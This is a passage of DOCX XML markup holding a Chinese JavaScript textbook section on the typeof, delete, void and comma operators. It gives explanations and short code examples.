                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>最常用</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的用法是写在表达式中，就像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(typeof value=="stri</w:t>
      </w:r>
      <w:r>
        <w:t>ng")?"'"+value+"'":value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符同样在</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）中非常有用，需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符可以带上圆括号，这让</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>看起来像一个函数名，而不是一个运算符关键字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>typeof(i)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们注意到，当操作数是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果想将</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和对象区分开，则必须针对特殊值显式检测。对于宿主对象来说，</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>有可能并不返回</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>，而返回字符串。但实际上客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的大多数宿主对</w:t>
      </w:r>
      <w:r>
        <w:t>象都是</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于所有对象和数组的</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算结果是</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>而不是</w:t>
      </w:r>
      <w:r>
        <w:t>"function"</w:t>
      </w:r>
      <w:r>
        <w:t>，因此它对于区分对象和其他原始值来说是很有帮助的。如果想区分对象的类，则需要使用其他的手段，比如使用</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符（参照</w:t>
      </w:r>
      <w:r>
        <w:t>4.9.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）、</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>特性（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）以及</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>§9.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数是对象的一种，但</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符还是将函数特殊对待，对函数做</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算有着特殊的返回值。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>中，函数和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可执行的对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>callable object</w:t>
      </w:r>
      <w:r>
        <w:t>）有着微妙的区别。所有的函数都是可执行的（</w:t>
      </w:r>
      <w:r>
        <w:t>callable</w:t>
      </w:r>
      <w:r>
        <w:t>），但是对象也有可能是可执行的，可以像调用函数一样调用它，但它并不是一个真正的函数。根据</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>规范，对于所有内置可执行对象，</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算符一律返回</w:t>
      </w:r>
      <w:r>
        <w:t>"function"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>规范则扩充至所有可执行对象，包括内置对象（</w:t>
      </w:r>
      <w:r>
        <w:t>native object</w:t>
      </w:r>
      <w:r>
        <w:t>）和宿主对象（</w:t>
      </w:r>
      <w:r>
        <w:t>host object</w:t>
      </w:r>
      <w:r>
        <w:t>），所有可执行对象进行</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算都将返回</w:t>
      </w:r>
      <w:r>
        <w:t>"function"</w:t>
      </w:r>
      <w:r>
        <w:t>。大多数</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器厂商也将</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的原生函数对象（</w:t>
      </w:r>
      <w:r>
        <w:t>native function object</w:t>
      </w:r>
      <w:r>
        <w:t>）当成它们的宿主对象的方法来使用。但微软却一直将非原生可执行对象（</w:t>
      </w:r>
      <w:r>
        <w:t>non-native callable object</w:t>
      </w:r>
      <w:r>
        <w:t>）当成其客户端的方法来使用，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>之前的版本中，非原生可执行对象的</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算将返回</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>，尽管它们的行为和函数非常相似。而在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>中，这些客户端方法是真正的内置函数对象（</w:t>
      </w:r>
      <w:r>
        <w:t>native function object</w:t>
      </w:r>
      <w:r>
        <w:t>）。要了解真正的函数和可执行对象之间的详细差别请参照</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.7</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="4_13_3_deleteYun_Suan_Fu_"/>
      <w:r>
        <w:t>4.13.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>是一元操作符，它用来删除对象属性或者数组元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>。就像赋值、递增、递减运算符一样，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>也是具有副作用的，它是用来做删除操作的，不是用来返回一个值的，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1,y:2};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"x"in o//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>这个属性在对象中不再存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3];//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete a[2];//</w:t>
      </w:r>
      <w:r>
        <w:t>删除最后一个数组元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 in </w:t>
      </w:r>
      <w:r>
        <w:t>a;//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>在数组中已经不存在了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:t>注意，数组长度并没有改变，尽管上一行代码删除了这个元素，但删除操作留下了一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>洞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，实际上并没有修改数组的长度，因此</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>数组的长度仍然是</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意的是，删除属性或者删除数组元素不仅仅是设置了一个</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的值。当删除一个属性时，这个属性将不再存在。读取一个不存在的属性将返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，但是可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.9.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）来检测这个属性是否在对象中存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>希望他的操作数是一个左值，如果它不是左值，</w:t>
      </w:r>
      <w:r>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>将不进行任何操作同时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。否则，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>将试图删除这个指定的左值。如果删除成功，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。然而并不是所有的属性都可删除，一些内置核心和客户端属性是不能删除的，用户通过</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句声明的变量不能删除。同样，通过</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>语句定义的函数和函数参数也不能删除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>严格模式中，如果</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>的操作数是非法的，比如变量、函数或函数参数，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作将抛出一个语法错误（</w:t>
      </w:r>
      <w:r>
        <w:t>SyntaxError</w:t>
      </w:r>
      <w:r>
        <w:t>）异常，只有操作数是一个属性访问表达式（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:t>）的时候它才会正常工作。在严格模式下，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>删除不可配置的属性（参照</w:t>
      </w:r>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）时会抛出一个类型错误异常。在非严格模式下，这些</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作都不会报错，只是简单地返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，以表明操作数不能执行删除操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这里有一些关于</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1,y:2};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个变量，初始化为对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除一个对象属性，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>typeof o.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>属性不存在，返回</w:t>
      </w:r>
      <w:r>
        <w:t>"undefined"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete o.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除不存在的属性，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>del</w:t>
      </w:r>
      <w:r>
        <w:t>ete o;//</w:t>
      </w:r>
      <w:r>
        <w:t>不能删除通过</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>声明的变量，返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式下，将抛出一个异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete 1;//</w:t>
      </w:r>
      <w:r>
        <w:t>参数不是一个左值，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.x=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>给全局对象定义一个属性，这里没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete x;//</w:t>
      </w:r>
      <w:r>
        <w:t>试图删除它，在非严格模式下返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式下会抛出异常，这时使用</w:t>
      </w:r>
      <w:r>
        <w:t>"delete this.x"</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x;//</w:t>
      </w:r>
      <w:r>
        <w:t>运行时错误，没有定义</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节还会有关于</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符的讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="4_13_4_voidYun_Suan_Fu_"/>
      <w:r>
        <w:t>4.13.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>是一元运算符，它出现在操作数之前，操作数</w:t>
      </w:r>
      <w:r>
        <w:t>可以是任意类型。这个运算符并不是经常使用：操作数会照常计算，但忽略计算结果并返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。由于</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>会忽略操作数的值，因此在操作数具有副作用的时候使用</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>来让程序更具语义。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个运算符最常用在客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>URL——javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>中，在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中可以写带有副作用的表达式，而</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>则让浏览器不必显示这个表达式的计算结果。例如，经常在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>代码中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签里使用</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>运算符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a href="javascript:void window.open();"</w:t>
      </w:r>
      <w:r>
        <w:t>＞打开一个新窗口＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过给＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>绑定一个事件处理程序要比在</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>中写</w:t>
      </w:r>
      <w:r>
        <w:t>"javascript:URL"</w:t>
      </w:r>
      <w:r>
        <w:t>要更加清晰，当然，这样的话</w:t>
      </w:r>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t>操作符就可有可无了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="4_13_5_Dou_Hao_Yun_Suan_Fu____"/>
      <w:r>
        <w:t>4.13.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　逗号运算符</w:t>
      </w:r>
      <w:r>
        <w:t>(,)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>逗号运算符是二元运算符，它的操作数可以是任意类型。它首先计算左操作数，然后计算右操作数，最后返回右操作数的值，看下面的示例代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i=0,j=1,k=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
